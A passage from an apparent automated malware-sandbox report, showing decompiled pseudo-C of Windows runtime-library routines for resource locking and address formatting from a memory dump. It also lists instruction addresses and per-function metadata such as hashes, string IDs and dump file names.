								_v8 = _t156;
								 *((short*)(_a12 + _v20 * 2)) = 0;
								goto L34;
							}
						}
						L8:
						if(_v8 > 7) {
							goto L41;
						}
						_t142 = _t141;
						if(E01F006BA(_t123, _t141) == 0 || _t124 == 0) {
							if(E01F006BA(_t124, _t142) == 0 || E01F00A5B(_t125, _t142) == 0 || _v24 > 0) {
								goto L41;
							} else {
								_t128 = 1;
								_a7 = 1;
								_v28 = _t179;
								_v16 = 1;
								_v12 = 1;
								L39:
								if(_v16 == _t128) {
									goto L20;
								}
								goto L28;
							}
						} else {
							_a7 = 0;
							_v28 = _t179;
							_v16 = 1;
							_v12 = 1;
							goto L20;
						}
					}
				}
				L1:
				_t123 = _t108 == 1;
				if(_t108 == 1) {
					goto L8;
				}
				_t128 = 1;
				goto L39;
			}

























                                                              0x01f00b21
                                                              0x01f00b24
                                                              0x01f00b27
                                                              0x01f00b2a
                                                              0x01f00b2d
                                                              0x01f00b30
                                                              0x01f00b33
                                                              0x01f00b36
                                                              0x01f00b39
                                                              0x01f00b3e
                                                              0x01f00c65
                                                              0x01f00c68
                                                              0x01f00c6a
                                                              0x01f00c6f
                                                              0x01f2eb42
                                                              0x00000000
                                                              0x00000000
                                                              0x01f2eb48
                                                              0x01f2eb48
                                                              0x01f00c75
                                                              0x01f00c7a
                                                              0x01f2eb54
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x01f2eb5a
                                                              0x01f00c80
                                                              0x01f00c84
                                                              0x01f2eb98
                                                              0x00000000
                                                              0x00000000
                                                              0x01f2eba6
                                                              0x01f00cb8
                                                              0x01f00cba
                                                              0x01f00cd3
                                                              0x01f00cda
                                                              0x01f00ce4
                                                              0x01f00ce9
                                                              0x00000000
                                                              0x01f00cec
                                                              0x01f00c8c
                                                              0x01f2eb63
                                                              0x00000000
                                                              0x00000000
                                                              0x01f2eb70
                                                              0x01f2eb75
                                                              0x01f2eb7d
                                                              0x00000000
                                                              0x00000000
                                                              0x01f2eb8c
                                                              0x00000000
                                                              0x01f2eb8c
                                                              0x01f00c96
                                                              0x00000000
                                                              0x00000000
                                                              0x01f00ca2
                                                              0x01f00cac
                                                              0x01f00cb4
                                                              0x00000000
                                                              0x00000000
                                                              0x01f00b44
                                                              0x01f00b47
                                                              0x01f00b49
                                                              0x00000000
                                                              0x00000000
                                                              0x01f00b4f
                                                              0x01f00b50
                                                              0x00000000
                                                              0x00000000
                                                              0x01f00b56
                                                              0x01f00b62
                                                              0x01f00b7c
                                                              0x01f00bac
                                                              0x01f00a0f
                                                              0x01f2eaaa
                                                              0x00000000
                                                              0x01f2eac4
                                                              0x01f2eac4
                                                              0x01f00bd0
                                                              0x01f00bd0
                                                              0x01f00bd4
                                                              0x01f00bd9
                                                              0x00000000
                                                              0x00000000
                                                              0x01f00bdb
                                                              0x01f00be0
                                                              0x01f2eb0e
                                                              0x01f00a1a
                                                              0x00000000
                                                              0x01f00a1a
                                                              0x01f2eb1a
                                                              0x01f2eb1f
                                                              0x01f2eb27
                                                              0x00000000
                                                              0x00000000
                                                              0x01f2eb36
                                                              0x00000000
                                                              0x01f2eb36
                                                              0x01f00bea
                                                              0x00000000
                                                              0x00000000
                                                              0x01f00bf6
                                                              0x01f00c00
                                                              0x01f00c03
                                                              0x01f00c0b
                                                              0x00000000
                                                              0x01f00c0b
                                                              0x01f2eaaa
                                                              0x00000000
                                                              0x01f00a15
                                                              0x01f00bb6
                                                              0x00000000
                                                              0x01f00bc6
                                                              0x01f00bc6
                                                              0x01f00bcb
                                                              0x01f00c15
                                                              0x00000000
                                                              0x00000000
                                                              0x01f00c1d
                                                              0x01f00c20
                                                              0x01f00c21
                                                              0x01f00c24
                                                              0x01f00c24
                                                              0x01f00c26
                                                              0x00000000
                                                              0x01f00c26
                                                              0x01f00bcd
                                                              0x00000000
                                                              0x01f00bcd
                                                              0x01f00b89
                                                              0x01f00b89
                                                              0x01f00b90
                                                              0x00000000
                                                              0x00000000
                                                              0x01f00b96
                                                              0x00000000
                                                              0x01f00b96
                                                              0x01f00a04
                                                              0x01f00a04
                                                              0x01f00b9a
                                                              0x01f00b9a
                                                              0x01f00b9b
                                                              0x01f00b9f
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x01f00ba5
                                                              0x01f00ac7
                                                              0x01f00aca
                                                              0x01f2eacf
                                                              0x00000000
                                                              0x01f2eade
                                                              0x01f2eade
                                                              0x01f2eae3
                                                              0x00000000
                                                              0x00000000
                                                              0x01f2eaf3
                                                              0x01f2eaf6
                                                              0x01f2eaf7
                                                              0x01f2eafe
                                                              0x01f2eb01
                                                              0x00000000
                                                              0x01f2eb01
                                                              0x01f2eacf
                                                              0x01f00ad0
                                                              0x01f00ad4
                                                              0x00000000
                                                              0x00000000
                                                              0x01f00ada
                                                              0x01f00ae6
                                                              0x01f00c34
                                                              0x00000000
                                                              0x01f00c47
                                                              0x01f00c49
                                                              0x01f00c4a
                                                              0x01f00c4e
                                                              0x01f00c51
                                                              0x01f00c54
                                                              0x01f00c57
                                                              0x01f00c5a
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x01f00c60
                                                              0x01f00afb
                                                              0x01f00afe
                                                              0x01f00b02
                                                              0x01f00b05
                                                              0x01f00b08
                                                              0x00000000
                                                              0x01f00b08
                                                              0x01f00ae6
                                                              0x01f00b44
                                                              0x01f009f8
                                                              0x01f009f8
                                                              0x01f009f9
                                                              0x00000000
                                                              0x00000000
                                                              0x01f2eaa0
                                                              0x00000000

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.665945266.0000000001EB0000.00000040.00000001.sdmp, Offset: 01EA0000, based on PE: true
                                                              • Associated: 00000006.00000002.665938551.0000000001EA0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000006.00000002.666041714.0000000001F90000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000006.00000002.666052467.0000000001FA0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000006.00000002.666063534.0000000001FA4000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000006.00000002.666081748.0000000001FA7000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000006.00000002.666114112.0000000001FB0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000006.00000002.666168843.0000000002010000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: __fassign
                                                              • String ID: .$:$:
                                                              • API String ID: 3965848254-2308638275
                                                              • Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                              • Instruction ID: 4c98f179a8272ff31137eafa3be1d57833a8c16a37f499a982a1463abc4aae5d
                                                              • Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                              • Instruction Fuzzy Hash: 32A18071D0070ADADF26CF58C8457BEBBB5AF05384F24846AF942A72C1DE325681EB52
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 01F00554, Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 202COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 50%
                                                              			E01F00554(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int* _t49;
				signed int _t51;
				signed int _t56;
				signed int _t58;
				signed int _t61;
				signed int _t63;
				void* _t66;
				intOrPtr _t67;
				void* _t69;
				signed int _t70;
				void* _t75;
				signed int _t81;
				signed int _t84;
				void* _t86;
				signed int _t93;
				signed int _t96;
				intOrPtr _t105;
				signed int _t107;
				void* _t110;
				signed int _t115;
				signed int* _t119;
				void* _t125;
				void* _t126;
				signed int _t128;
				signed int _t130;
				signed int _t138;
				signed int _t144;
				void* _t158;
				void* _t159;
				void* _t160;

				_t96 = _a4;
				_t115 =  *(_t96 + 0x28);
				_push(_t138);
				if(_t115 < 0) {
					_t105 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
						goto L6;
					} else {
						__eflags = _t115 | 0xffffffff;
						asm("lock xadd [eax], edx");
						return 1;
					}
				} else {
					L6:
					_push(_t128);
					while(1) {
						L7:
						__eflags = _t115;
						if(_t115 >= 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
							_t49 = _t96 + 0x1c;
							_t106 = 1;
							asm("lock xadd [edx], ecx");
							_t115 =  *(_t96 + 0x28);
							__eflags = _t115;
							if(_t115 < 0) {
								L23:
								_t130 = 0;
								__eflags = 0;
								while(1) {
									_t118 =  *(_t96 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x01fa01c0;
									_push(_t144);
									_push(0);
									_t51 = E01EBF8CC( *((intOrPtr*)(_t96 + 0x18)));
									__eflags = _t51 - 0x102;
									if(_t51 != 0x102) {
										break;
									}
									_t106 =  *(_t144 + 4);
									_t126 =  *_t144;
									_t86 = E01F04FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
									_push(_t126);
									_push(_t86);
									E01F13F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
									E01F13F92(0x65, 0, "RTL: Resource at %p\n", _t96);
									_t130 = _t130 + 1;
									_t160 = _t158 + 0x28;
									__eflags = _t130 - 2;
									if(__eflags > 0) {
										E01F4217A(_t106, __eflags, _t96);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E01F13F92();
									_t158 = _t160 + 0xc;
								}
								__eflags = _t51;
								if(__eflags < 0) {
									_push(_t51);
									E01F03915(_t96, _t106, _t118, _t130, _t144, __eflags);
									asm("int3");
									while(1) {
										L32:
										__eflags = _a8;
										if(_a8 == 0) {
											break;
										}
										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
										_t119 = _t96 + 0x24;
										_t107 = 1;
										asm("lock xadd [eax], ecx");
										_t56 =  *(_t96 + 0x28);
										_a4 = _t56;
										__eflags = _t56;
										if(_t56 != 0) {
											L40:
											_t128 = 0;
											__eflags = 0;
											while(1) {
												_t121 =  *(_t96 + 0x30) & 0x00000001;
												asm("sbb esi, esi");
												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x01fa01c0;
												_push(_t138);
												_push(0);
												_t58 = E01EBF8CC( *((intOrPtr*)(_t96 + 0x20)));
												__eflags = _t58 - 0x102;
												if(_t58 != 0x102) {
													break;
												}
												_t107 =  *(_t138 + 4);
												_t125 =  *_t138;
												_t75 = E01F04FC0(_t125, _t107, 0xff676980, 0xffffffff);
												_push(_t125);
												_push(_t75);
												E01F13F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
												E01F13F92(0x65, 0, "RTL: Resource at %p\n", _t96);
												_t128 = _t128 + 1;
												_t159 = _t158 + 0x28;
												__eflags = _t128 - 2;
												if(__eflags > 0) {
													E01F4217A(_t107, __eflags, _t96);
												}
												_push("RTL: Re-Waiting\n");
												_push(0);
												_push(0x65);
												E01F13F92();
												_t158 = _t159 + 0xc;
											}
											__eflags = _t58;
											if(__eflags < 0) {
												_push(_t58);
												E01F03915(_t96, _t107, _t121, _t128, _t138, __eflags);
												asm("int3");
												_t61 =  *_t107;
												 *_t107 = 0;
												__eflags = _t61;
												if(_t61 == 0) {
													L1:
													_t63 = E01EE5384(_t138 + 0x24);
													if(_t63 != 0) {
														goto L52;
													} else {
														goto L2;
													}
												} else {
													_t123 =  *((intOrPtr*)(_t138 + 0x18));
													_push( &_a4);
													_push(_t61);
													_t70 = E01EBF970( *((intOrPtr*)(_t138 + 0x18)));
													__eflags = _t70;
													if(__eflags >= 0) {
														goto L1;
													} else {
														_push(_t70);
														E01F03915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
														L52:
														_t122 =  *((intOrPtr*)(_t138 + 0x20));
														_push( &_a4);
														_push(1);
														_t63 = E01EBF970( *((intOrPtr*)(_t138 + 0x20)));
														__eflags = _t63;
														if(__eflags >= 0) {
															L2:
															return _t63;
														} else {
															_push(_t63);
															E01F03915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
															_t109 =  *((intOrPtr*)(_t138 + 0x20));
															_push( &_a4);
															_push(1);
															_t63 = E01EBF970( *((intOrPtr*)(_t138 + 0x20)));
															__eflags = _t63;
															if(__eflags >= 0) {
																goto L2;
															} else {
																_push(_t63);
																_t66 = E01F03915(_t96, _t109, _t122, _t128, _t138, __eflags);
																asm("int3");
																while(1) {
																	_t110 = _t66;
																	__eflags = _t66 - 1;
																	if(_t66 != 1) {
																		break;
																	}
																	_t128 = _t128 | 0xffffffff;
																	_t66 = _t110;
																	asm("lock cmpxchg [ebx], edi");
																	__eflags = _t66 - _t110;
																	if(_t66 != _t110) {
																		continue;
																	} else {
																		_t67 =  *[fs:0x18];
																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
																		return _t67;
																	}
																	goto L59;
																}
																E01EE5329(_t110, _t138);
																_t69 = E01EE53A5(_t138, 1);
																return _t69;
															}
														}
													}
												}
											} else {
												_t56 =  *(_t96 + 0x28);
												goto L3;
											}
										} else {
											_t107 =  *_t119;
											__eflags = _t107;
											if(__eflags > 0) {
												while(1) {
													_t81 = _t107;
													asm("lock cmpxchg [edi], esi");
													__eflags = _t81 - _t107;
													if(_t81 == _t107) {
														break;
													}
													_t107 = _t81;
													__eflags = _t81;
													if(_t81 > 0) {
														continue;
													}
													break;
												}
												_t56 = _a4;
												__eflags = _t107;
											}
											if(__eflags != 0) {
												while(1) {
													L3:
													__eflags = _t56;
													if(_t56 != 0) {
														goto L32;
													}
													_t107 = _t107 | 0xffffffff;
													_t56 = 0;
													asm("lock cmpxchg [edx], ecx");
													__eflags = 0;
													if(0 != 0) {
														continue;
													} else {
														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
														return 1;
													}
													goto L59;
												}
												continue;
											} else {
												goto L40;
											}
										}
										goto L59;
									}
									__eflags = 0;
									return 0;
								} else {
									_t115 =  *(_t96 + 0x28);
									continue;
								}
							} else {
								_t106 =  *_t49;
								__eflags = _t106;
								if(__eflags > 0) {
									while(1) {
										_t93 = _t106;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t93 - _t106;
										if(_t93 == _t106) {
											break;
										}
										_t106 = _t93;
										__eflags = _t93;
										if(_t93 > 0) {
											continue;
										}
										break;
									}
									__eflags = _t106;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L23;
								}
							}
						}
						goto L59;
					}
					_t84 = _t115;
					asm("lock cmpxchg [esi], ecx");
					__eflags = _t84 - _t115;
					if(_t84 != _t115) {
						_t115 = _t84;
						goto L7;
					} else {
						return 1;
					}
				}
				L59:
			}




































                                                              0x01f0055a
                                                              0x01f0055d
                                                              0x01f00563
                                                              0x01f00566
                                                              0x01f005d8
                                                              0x01f005e2
                                                              0x01f005e5
                                                              0x00000000
                                                              0x01f005e7
                                                              0x01f005e7
                                                              0x01f005ea
                                                              0x01f005f3
                                                              0x01f005f3
                                                              0x01f00568
                                                              0x01f00568
                                                              0x01f00568
                                                              0x01f00569
                                                              0x01f00569
                                                              0x01f00569
                                                              0x01f0056b
                                                              0x00000000
                                                              0x00000000
                                                              0x01f2217f
                                                              0x01f22183
                                                              0x01f2225b
                                                              0x01f2225f
                                                              0x01f22189
                                                              0x01f2218c
                                                              0x01f2218f
                                                              0x01f22194
                                                              0x01f22199
                                                              0x01f2219d
                                                              0x01f221a0
                                                              0x01f221a2
                                                              0x01f221ce
                                                              0x01f221ce
                                                              0x01f221ce
                                                              0x01f221d0
                                                              0x01f221d6
                                                              0x01f221de
                                                              0x01f221e2
                                                              0x01f221e8
                                                              0x01f221e9
                                                              0x01f221ec
                                                              0x01f221f1
                                                              0x01f221f6
                                                              0x00000000
                                                              0x00000000
                                                              0x01f221f8
                                                              0x01f221fb
                                                              0x01f22206
                                                              0x01f2220b
                                                              0x01f2220c
                                                              0x01f22217
                                                              0x01f22226
                                                              0x01f2222b
                                                              0x01f2222c
                                                              0x01f2222f
                                                              0x01f22232
                                                              0x01f22235
                                                              0x01f22235
                                                              0x01f2223a
                                                              0x01f2223f
                                                              0x01f22241
                                                              0x01f22243
                                                              0x01f22248
                                                              0x01f22248
                                                              0x01f2224d
                                                              0x01f2224f
                                                              0x01f22262
                                                              0x01f22263
                                                              0x01f22268
                                                              0x01f22269
                                                              0x01f22269
                                                              0x01f22269
                                                              0x01f2226d
                                                              0x00000000
                                                              0x00000000
                                                              0x01f22276
                                                              0x01f22279
                                                              0x01f2227e
                                                              0x01f22283
                                                              0x01f22287
                                                              0x01f2228a
                                                              0x01f2228d
                                                              0x01f2228f
                                                              0x01f222bc
                                                              0x01f222bc
                                                              0x01f222bc
                                                              0x01f222be
                                                              0x01f222c4
                                                              0x01f222cc
                                                              0x01f222d0
                                                              0x01f222d6
                                                              0x01f222d7
                                                              0x01f222da
                                                              0x01f222df
                                                              0x01f222e4
                                                              0x00000000
                                                              0x00000000
                                                              0x01f222e6
                                                              0x01f222e9
                                                              0x01f222f4
                                                              0x01f222f9
                                                              0x01f222fa
                                                              0x01f22305
                                                              0x01f22314
                                                              0x01f22319
                                                              0x01f2231a
                                                              0x01f2231d
                                                              0x01f22320
                                                              0x01f22323
                                                              0x01f22323
                                                              0x01f22328
                                                              0x01f2232d
                                                              0x01f2232f
                                                              0x01f22331
                                                              0x01f22336
                                                              0x01f22336
                                                              0x01f2233b
                                                              0x01f2233d
                                                              0x01f22350
                                                              0x01f22351
                                                              0x01f22356
                                                              0x01f22359
                                                              0x01f22359
                                                              0x01f2235b
                                                              0x01f2235d
                                                              0x01ee5367
                                                              0x01ee536b
                                                              0x01ee5372
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x01f22363
                                                              0x01f22363
                                                              0x01f22369
                                                              0x01f2236a
                                                              0x01f2236c
                                                              0x01f22371
                                                              0x01f22373
                                                              0x00000000
                                                              0x01f22379
                                                              0x01f22379
                                                              0x01f2237a
                                                              0x01f2237f
                                                              0x01f2237f
                                                              0x01f22385
                                                              0x01f22386
                                                              0x01f22389
                                                              0x01f2238e
                                                              0x01f22390
                                                              0x01ee5378
                                                              0x01ee537c
                                                              0x01f22396
                                                              0x01f22396
                                                              0x01f22397
                                                              0x01f2239c
                                                              0x01f223a2
                                                              0x01f223a3
                                                              0x01f223a6
                                                              0x01f223ab
                                                              0x01f223ad
                                                              0x00000000
                                                              0x01f223b3
                                                              0x01f223b3
                                                              0x01f223b4
                                                              0x01f223b9
                                                              0x01f223ba
                                                              0x01f223ba
                                                              0x01f223bc
                                                              0x01f223bf
                                                              0x00000000
                                                              0x00000000
                                                              0x01f19153
                                                              0x01f19158
                                                              0x01f1915a
                                                              0x01f1915e
                                                              0x01f19160
                                                              0x00000000
                                                              0x01f19166
                                                              0x01f19166
                                                              0x01f19171
                                                              0x01f19176
                                                              0x01f19176
                                                              0x00000000
                                                              0x01f19160
                                                              0x01f223c6
                                                              0x01f223ce
                                                              0x01f223d7
                                                              0x01f223d7
                                                              0x01f223ad
                                                              0x01f22390
                                                              0x01f22373
                                                              0x01f2233f
                                                              0x01f2233f
                                                              0x00000000
                                                              0x01f2233f
                                                              0x01f22291
                                                              0x01f22291
                                                              0x01f22293
                                                              0x01f22295
                                                              0x01f2229a
                                                              0x01f222a1
                                                              0x01f222a3
                                                              0x01f222a7
                                                              0x01f222a9
                                                              0x00000000
                                                              0x00000000
                                                              0x01f222ab
                                                              0x01f222ad
                                                              0x01f222af
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x01f222af
                                                              0x01f222b1
                                                              0x01f222b4
                                                              0x01f222b4
                                                              0x01f222b6
                                                              0x01ee53be
                                                              0x01ee53be
                                                              0x01ee53be
                                                              0x01ee53c0
                                                              0x00000000
                                                              0x00000000
                                                              0x01ee53cb
                                                              0x01ee53ce
                                                              0x01ee53d0
                                                              0x01ee53d4
                                                              0x01ee53d6
                                                              0x00000000
                                                              0x01ee53d8
                                                              0x01ee53e3
                                                              0x01ee53ea
                                                              0x01ee53ea
                                                              0x00000000
                                                              0x01ee53d6
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x01f222b6
                                                              0x00000000
                                                              0x01f2228f
                                                              0x01f22349
                                                              0x01f2234d
                                                              0x01f22251
                                                              0x01f22251
                                                              0x00000000
                                                              0x01f22251
                                                              0x01f221a4
                                                              0x01f221a4
                                                              0x01f221a6
                                                              0x01f221a8
                                                              0x01f221ac
                                                              0x01f221b6
                                                              0x01f221b8
                                                              0x01f221bc
                                                              0x01f221be
                                                              0x00000000
                                                              0x00000000
                                                              0x01f221c0
                                                              0x01f221c2
                                                              0x01f221c4
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x01f221c4
                                                              0x01f221c6
                                                              0x01f221c6
                                                              0x01f221c8
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x01f221c8
                                                              0x01f221a2
                                                              0x00000000
                                                              0x01f22183
                                                              0x01f0057b
                                                              0x01f0057d
                                                              0x01f00581
                                                              0x01f00583
                                                              0x01f22178
                                                              0x00000000
                                                              0x01f00589
                                                              0x01f0058f
                                                              0x01f0058f
                                                              0x01f00583
                                                              0x00000000

                                                              APIs
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01F22206
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.665945266.0000000001EB0000.00000040.00000001.sdmp, Offset: 01EA0000, based on PE: true
                                                              • Associated: 00000006.00000002.665938551.0000000001EA0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000006.00000002.666041714.0000000001F90000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000006.00000002.666052467.0000000001FA0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000006.00000002.666063534.0000000001FA4000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000006.00000002.666081748.0000000001FA7000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000006.00000002.666114112.0000000001FB0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000006.00000002.666168843.0000000002010000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                              • API String ID: 885266447-4236105082
                                                              • Opcode ID: 776ca66a4ffd9ca4ee43b6e64642fd2901141f32e3affef4b93b9b966d21a4ba
                                                              • Instruction ID: 1e1038bc1d5cadf5e91f5572137b1553332d9f9746f829c436d81a66c14d043e
                                                              • Opcode Fuzzy Hash: 776ca66a4ffd9ca4ee43b6e64642fd2901141f32e3affef4b93b9b966d21a4ba
                                                              • Instruction Fuzzy Hash: B8512B35B00222ABEB15CA1DDC81FA673A9AFD5720F21421DFD55DB2C9DA33EC428790
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 01F014C0, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 64%
                                                              			E01F014C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
				signed int _v8;
				char _v10;
				char _v140;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t24;
				void* _t26;
				signed int _t29;
				signed int _t34;
				signed int _t40;
				intOrPtr _t45;
				void* _t51;
				intOrPtr* _t52;
				void* _t54;
				signed int _t57;
				void* _t58;

				_t51 = __edx;
				_t24 =  *0x1fa2088; // 0x745fb394
				_v8 = _t24 ^ _t57;
				_t45 = _a16;
				_t53 = _a4;
				_t52 = _a20;
				if(_a4 == 0 || _t52 == 0) {
					L10:
					_t26 = 0xc000000d;
				} else {
					if(_t45 == 0) {
						if( *_t52 == _t45) {
							goto L3;
						} else {
							goto L10;
						}
					} else {
						L3:
						_t28 =  &_v140;
						if(_a12 != 0) {
							_push("[");
							_push(0x41);
							_push( &_v140);
							_t29 = E01EF7707();
							_t58 = _t58 + 0xc;
							_t28 = _t57 + _t29 * 2 - 0x88;
						}
						_t54 = E01F013CB(_t53, _t28);
						if(_a8 != 0) {
							_t34 = E01EF7707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t34 * 2;
						}
						if(_a12 != 0) {
							_t40 = E01EF7707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t40 * 2;
						}
						_t53 = (_t54 -  &_v140 >> 1) + 1;
						 *_t52 = _t53;
						if( *_t52 < _t53) {
							goto L10;
						} else {
							E01EC2340(_t45,  &_v140, _t53 + _t53);
							_t26 = 0;
						}
					}
				}
				return E01ECE1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53);
			}




















                                                              0x01f014c0
                                                              0x01f014cb
                                                              0x01f014d2
                                                              0x01f014d6
                                                              0x01f014da
                                                              0x01f014de
                                                              0x01f014e3
                                                              0x01f0157a
                                                              0x01f0157a
                                                              0x01f014f1
                                                              0x01f014f3
                                                              0x01f2ea0f
                                                              0x00000000
                                                              0x01f2ea15
                                                              0x00000000
                                                              0x01f2ea15
                                                              0x01f014f9
                                                              0x01f014f9
                                                              0x01f014fe
                                                              0x01f01504
                                                              0x01f2ea1a
                                                              0x01f2ea1f
                                                              0x01f2ea21
                                                              0x01f2ea22
                                                              0x01f2ea27
                                                              0x01f2ea2a
                                                              0x01f2ea2a
                                                              0x01f01515
                                                              0x01f01517
                                                              0x01f0156d
                                                              0x01f01572
                                                              0x01f01575
                                                              0x01f01575
                                                              0x01f0151e
                                                              0x01f2ea50
                                                              0x01f2ea55
                                                              0x01f2ea58
                                                              0x01f2ea58
                                                              0x01f0152e
                                                              0x01f01531
                                                              0x01f01533
                                                              0x00000000
                                                              0x01f01535
                                                              0x01f01541
                                                              0x01f01549
                                                              0x01f01549
                                                              0x01f01533
                                                              0x01f014f3
                                                              0x01f01559

                                                              APIs
                                                              • ___swprintf_l.LIBCMT ref: 01F2EA22
                                                                • Part of subcall function 01F013CB: ___swprintf_l.LIBCMT ref: 01F0146B
                                                                • Part of subcall function 01F013CB: ___swprintf_l.LIBCMT ref: 01F01490
                                                              • ___swprintf_l.LIBCMT ref: 01F0156D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.665945266.0000000001EB0000.00000040.00000001.sdmp, Offset: 01EA0000, based on PE: true
                                                              • Associated: 00000006.00000002.665938551.0000000001EA0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000006.00000002.666041714.0000000001F90000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000006.00000002.666052467.0000000001FA0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000006.00000002.666063534.0000000001FA4000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000006.00000002.666081748.0000000001FA7000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000006.00000002.666114112.0000000001FB0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000006.00000002.666168843.0000000002010000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: %%%u$]:%u
                                                              • API String ID: 48624451-3050659472
                                                              • Opcode ID: d4ce5fec15419ee9109ddea44788489f6df361f841beb52175bcbe6ca0a70ea6
                                                              • Instruction ID: b8fec63dcaf66e06fb6b1f3d5f0b701fc8d4b2e3cd77cc0235f6c93a22616211
                                                              • Opcode Fuzzy Hash: d4ce5fec15419ee9109ddea44788489f6df361f841beb52175bcbe6ca0a70ea6
                                                              • Instruction Fuzzy Hash: AA21F772D0021ADBDB22DF58CC00AFF77ACAB90704F484019ED46E7181DB72DA598BE0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 01EE53A5, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 185COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 45%
                                                              			E01EE53A5(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t32;
				signed int _t37;
				signed int _t40;
				signed int _t42;
				void* _t45;
				intOrPtr _t46;
				void* _t48;
				signed int _t49;
				void* _t51;
				signed int _t57;
				signed int _t64;
				signed int _t71;
				void* _t74;
				intOrPtr _t78;
				signed int* _t79;
				void* _t85;
				signed int _t86;
				signed int _t92;
				void* _t104;
				void* _t105;

				_t64 = _a4;
				_t32 =  *(_t64 + 0x28);
				_t71 = _t64 + 0x28;
				_push(_t92);
				if(_t32 < 0) {
					_t78 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
						goto L3;
					} else {
						__eflags = _t32 | 0xffffffff;
						asm("lock xadd [ecx], eax");
						return 1;
					}
				} else {
					L3:
					_push(_t86);
